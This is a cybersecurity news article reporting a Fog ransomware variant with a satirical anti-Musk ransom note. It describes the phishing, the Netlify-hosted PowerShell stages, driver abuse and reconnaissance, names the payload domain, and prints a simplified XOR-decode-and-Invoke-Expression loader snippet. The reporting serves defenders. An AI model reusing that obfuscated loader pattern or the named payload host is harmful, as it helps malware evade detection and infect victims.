New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads

A sophisticated ransomware campaign specifically targeting and mocking supporters of Elon Musk has been identified by cybersecurity experts.

The attack, identified as a variant of Fog Ransomware, employs multi-stage PowerShell scripts and Netlify-hosted payloads to execute its malicious code.

This campaign represents a concerning evolution in politically-themed malware that combines financial motivation with satirical commentary.

The ransomware distinguishes itself through its unusual ransom note, which impersonates an individual named “Edward Coristine” allegedly associated with DOGE cryptocurrency.

In a bizarre twist, the note lists government email addresses as technical support contacts and contains satirical content directed at Musk supporters.

Upon execution, the malware launches a YouTube video mocking Elon Musk, serving both as a distraction technique and reinforcement of its parodical nature.

KrakenLabs researchers identified the campaign after tracing a series of infections back to phishing emails containing PDF attachments with misleading “Pay Adjustment” titles.

The attack employs a sophisticated chain involving .lnk file droppers and multiple stages of PowerShell execution, demonstrating a blend of technical prowess and psychological manipulation targeting specific groups.

The complete infection chain involves multiple components working in concert. The initial compromise begins with a phishing PDF that links to a Netlify-hosted ZIP archive, which then deploys a chain of PowerShell scripts beginning with “Pay.ps1” that orchestrates the attack.

The core payload includes “cwiper.exe” (the actual ransomware component), “ktool.exe” (utilizing Intel BYOVD technique for kernel-level access), and specialized PowerShell scripts for reconnaissance.

Despite its satirical presentation, the presence of a Monero cryptocurrency wallet confirms the attack’s financial motivation beneath its trolling veneer.

This dual-purpose approach-financial gain masked by political mockery-represents an emerging trend in ransomware tactics that attempt to obscure criminal intent behind ideological facades.

Infection Mechanism Details

The infection begins when victims open a phishing PDF purportedly containing pay adjustment information.

This document links to a Netlify-hosted domain (hilarious-trifle-d9182e.netlify.app) where malicious payloads are stored.

The initial PowerShell script (“Pay.ps1”) acts as the first-stage loader, which downloads and executes “stage1.ps1”-the primary orchestration component.

This script is responsible for deploying the remaining modules and establishing persistence.

# Simplified representation of the obfuscation method used in trackerjacker.ps1
$encoded = "XOR-obfuscated payload data"
$key = "KrakenObserved2025"
$decoded = for($i=0; $i -lt $encoded. Length; $i++) {
    $encoded[$i] -bxor $key[$i % $key. Length]
}
Invoke-Expression([System.Text.Encoding]::ASCII.GetString($decoded))

The most technically sophisticated component is “trackerjacker.ps1,” which employs XOR-based obfuscation to evade detection.

After deobfuscation, this script performs system reconnaissance while “lootsubmit.ps1” leverages the Wigle API for geolocation data gathering.

Together with “cwiper.exe,” which performs the actual encryption, and “ktool.exe,” which provides kernel-level access through legitimate Intel drivers, this attack demonstrates a concerning level of technical sophistication behind its satirical facade.

How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers

The post New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads appeared first on Cyber Security News.